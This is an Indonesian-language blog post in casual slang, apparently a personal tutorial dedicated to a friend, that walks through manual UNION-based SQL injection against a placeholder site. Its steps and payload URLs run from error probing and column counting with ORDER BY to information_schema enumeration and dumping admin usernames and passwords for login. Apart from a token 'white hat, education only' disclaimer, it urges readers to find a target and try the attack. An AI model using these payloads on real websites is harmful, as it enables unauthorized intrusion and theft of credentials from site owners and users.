Waktu itu gw ga Ngeh paz dia Bilang SQL-SQL, gw kira itu software atau database apaan. Tapi paz kemaren gw gy mikir-mikir(SoQ Bener) muncul tuch di otaQ gw SQL Injection N paz gw inget kata dia itu buat Nghack Website…hahaha berarti bener yang dimaksud sama dia ini, makanya gw posting Khusus buat dia.
Pendahuluan Dulu ya biar asiQ ( Kaya Bikin Makalah Aja hhe)
Apa Sih TuCh SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.
Udah dah ga Usah pake lama-lama pendahuluannya hhe….
Kalo mau tau pengertian yang lebih jelas Lu Cari aja Di Search Engine (Google,Yahoo, Bing, Cuil Or etc)
1. Pertama kali yang kita lakukan tentu mencari target, ya iya lah klo ga ada yang mau di Hack mah percuma. Misalnya target kita kali ini adalah http://www.target.com/berita.php?id=100
2. Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error...
"You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near '''
at line 1" Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya...
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hahaha...apalagi itu "/*" ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake "--". Terserah Lu aja...
Kalo "+" sebagai penghubung perintah...
6. Nah sampe sini langsung dah Lu cobain satu - satu...
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (tambah malez)
http://www.target.com/berita.php?id=100+order+by+5/* (jangan nyerah)
Sampai muncul error...
Misalkan errornya disini...
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah "9"
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus Lu Liat angka berapa yang keluar (Jadi kaya Togel ye nunggu angka hahaha)
8. Misalnya angka hoki yang keluar adalah "3" maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah "version()" atau "@@version"
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah "information_schema" untuk melihat tabel dan kolom yang ada pada database...
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah, katanya yang ngajarin gw sih kalo buat Ngeliat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gw ga’ pake keliatan kok tabelnya...Apa gw salah? Mungkin tapi belum tentu juga hhe Cuz mank suka-suka gw kan hahaha
Lanjut, Misalnya yang lo liat adalah table "admin"
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata "table"-nya...
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah "password" dan "username"
Langsung aja kita liat isinya...
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ‘N passwordnya...Abiz itu tinggal login aja dah...Cari-cari yang Lu anggap asiQ buat dimainin...Truz terserah Lu aja dah mau diapain asal jangan Ngelanggar Undang-Undang ITE hhe...( Cuz Kita kan White Hat yang taat pemerintah N Cuma Buat Edukasi Doank )
Oiya kaya biasa gw ga tanggung kalo ada apa-apa hhee….
Bukannya Lepas tanggung jawab nie, tapi kan Lu sendiri udah pada gede jadi gw anggap Lu Smua udah tau yang baik sama yang nggak. So, Klo Lu anggap ga baik ya jangan Dicoba….Iya Ga??? Paztinya… atau kalo Lu mau Coba juga ya jangan diapa-apain tuch Web targetnya kalo Lu udah dapet Username ‘N Passwordnya.
Okeh Sekian N’ terima kasih (Kaya Pidato aja gw hahaha)….
Pokoknya Happy Blogging Aja dah buat Smua………
Thnx To: Jasakom, Brother Cruzen, N My Community (*****Hacker And ****Hacker).
Dedicated To: Musa, All Visitor Of DJ-Site…..